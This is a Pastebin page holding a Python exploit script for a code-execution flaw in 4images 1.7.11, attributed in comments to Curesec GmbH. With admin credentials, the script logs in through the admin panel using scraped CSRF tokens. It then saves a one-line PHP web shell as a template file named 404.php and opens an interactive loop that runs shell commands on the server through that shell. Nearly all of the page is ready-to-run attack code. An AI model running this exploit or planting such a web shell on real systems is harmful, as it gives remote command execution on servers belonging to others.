SHARE
TWEET

4images 1.7.11 Code Execution

3xploit3r Aug 12th, 2016 113 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/local/bin/python
  2. # Exploit for 4images 1.7.11 Code Execution vulnerability
  3. # An admin account is required to use this exploit
  4. # Curesec GmbH
  5.  
  6. import sys
  7. import re
  8. import argparse
  9. import requests # requires requests lib
  10.  
  11. parser = argparse.ArgumentParser()
  12. parser.add_argument("url", help="base url to vulnerable site")
  13. parser.add_argument("username", help="admin username")
  14. parser.add_argument("password", help="admin password")
  15. args = parser.parse_args()
  16.  
  17. url = args.url
  18. username = args.username
  19. password = args.password
  20.  
  21. loginPath = "/admin/index.php"
  22. fileManagerPath = "/admin/templates.php"
  23.  
  24. shellFileName = "404.php"
  25. shellContent = "<?php passthru($_GET['x']); ?>"
  26.  
  27. def login(requestSession, url, username, password):
  28.     csrfRequest = requestSession.get(url)
  29.     csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
  30.     csrfToken = csrfTokenRegEx.group(1)
  31.  
  32.     postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}
  33.     loginResult = requestSession.post(url, data = postData).text
  34.     return "loginpassword" not in loginResult
  35.  
  36. def upload(requestSession, url, fileName, fileContent):
  37.     csrfRequest = requestSession.get(url)
  38.     csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
  39.     csrfToken = csrfTokenRegEx.group(1)
  40.  
  41.     postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}
  42.     loginResult = requestSession.post(url, data = postData).text
  43.  
  44. def runShell(url):
  45.     print("enter command, or enter exit to quit.")
  46.     command = raw_input("$ ")
  47.     while "exit" not in command:
  48.         print(requests.get(url + command).text)
  49.         command = raw_input("$ ")
  50.  
  51. requestSession = requests.session()
  52.  
  53. if login(requestSession, url + loginPath, username, password):
  54.     print("successful: login")
  55. else:
  56.     exit("ERROR: Incorrect username or password")
  57.  
  58. upload(requestSession, url + fileManagerPath, shellFileName, shellContent)
  59.  
  60. runShell(url + "/templates/default/" + shellFileName + "?x=")
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top